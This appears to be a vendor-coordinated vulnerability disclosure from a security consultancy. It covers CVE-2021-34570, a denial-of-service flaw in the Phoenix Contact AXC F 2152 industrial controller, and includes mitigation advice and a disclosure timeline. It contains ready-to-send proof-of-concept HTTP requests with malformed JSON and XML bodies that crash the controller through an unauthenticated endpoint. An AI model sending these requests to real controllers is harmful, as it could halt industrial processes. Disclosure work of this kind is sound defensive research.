Phoenix Contact AXC F 2152 Denial of Service Vulnerability

Author: Oliver Carrigan – OT Security Consultant

Introduction

The Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh industrial environments to control industrial processes such as manufacturing lines and building management systems. The controller was seen to be vulnerable to a restart vulnerability (CVE-2021-34570) which would allow an unauthenticated attacker with network access to the device to create a denial-of-service condition, impacting the availability of the device.

Vulnerability

The controller runs a Linux based operating system on top of which lies a REST-based API web service used to interact with the web-based HMI. The HMI is used to provide a graphical representation of the current process under control. In order to view the web-based HMI, the controller implements a 3-stage authentication process using Oauth to authenticate the user and ensure they are authorised to access the web-based HMI. An attacker could abuse the /_pxc_api/v1.2/auth/access-token endpoint used in the authentication process which would force the controller to restart due to a segmentation fault within the controller. This is achieved by crafting a malformed JSON request to the endpoint.

Using a web interception proxy, and modifying the following request:
 
POST /_pxc_api/v1.2/auth/access-token
Host: <IP>
Connection: close
Content-Length: 129
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept: */*
Origin: https://<IP>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<IP>/ehmi/hmiapp.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"code":"be3fcb3c2bdeff54","grant_type":"authorization_code","username":"*********","password":"********","state":"30a847a460c6a1f6"}
 

The following POCs were used to launch the attack:

POST /_pxc_api/v1.2/auth/access-token

Host: <IP>
Connection: close
Content-Length: 3
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept: */*
Origin: https://<IP>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<IP>/ehmi/hmiapp.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{
A
}

POST /_pxc_api/v1.2/auth/access-token

Host: <IP>
Connection: close
Content-Length: 234
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept: */*
Origin: https://<IP>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<IP>/ehmi/hmiapp.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<root>
     <password>********</password>
     <code>db0d04e21dbc0ede</code>
     <grant_type/>
     <state>4cf70d2058cb2b62</state>
     <username>*********</username>
</root>

Both POCs result in the controller returning the following response and the controller stops responding to ICMP requests.

HTTP/1.1 502 Bad Gateway
Server: nginx
Date:
Content-Type: text/html
Content-Length: 552
Connection: close

<html>
<head><title>502 Bad Gateway</title></head>
<body>
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->

Proof of Concept Video

Likelihood

Whilst /_pxc_api/v1.2/auth/access-token endpoint is accessible without any authentication an attacker would require access to a closed network, typically protected by a suitable firewall, the controller is on to perform this attack.

Impact

The AXC F 2125 controller is predominantly found within manufacturing facilities and an attacker that successfully exploits this vulnerability would be able to stop the manufacturing process resulting in financial loss and reputational harm. An attacker could script this exploit in order to cause a lasting impact on the production output.

 

Mitigation

Phoenix Contact have released an advisory for this vulnerability which can be found HERE and are advising that all customers update their devices’ firmware to at least 2021.0.5 LTS or higher. Additionally, operators should ensure that controllers are contained within a closed network with suitable protection such as a firewall.
 
Dionach would like to thank Phoenix Contact for responding to the responsible disclosure in a timely manner and for working with Dionach to mitigate this vulnerability.

 

Timeline

17th May 2021 | Details of the vulnerability has been emailed to the vendor at [email protected].
17th May 2021 | Response from the vendor acknowledging the vulnerability
2nd June 2021 | Vendor confirms that the vulnerability was not able to be reproduced on firmware version 2021.0.5 LTS and asked Dionach to confirm also.
25th June 2021 | Dionach confirmed the vulnerability is no longer present on the firmware version 2021.0.5 LTS.
25th June 2021 | CVE number allocated and Dionach worked with the vendor on a publication date of this vulnerability.
4th August 2021 | Advisory was issued on the vendors.
 
 

Find out how we can help with your cyber challenge

Please enter your contact details using the form below for a free, no obligation, quote and we will get back to you as soon as possible. Alternatively, you can email us directly at [email protected]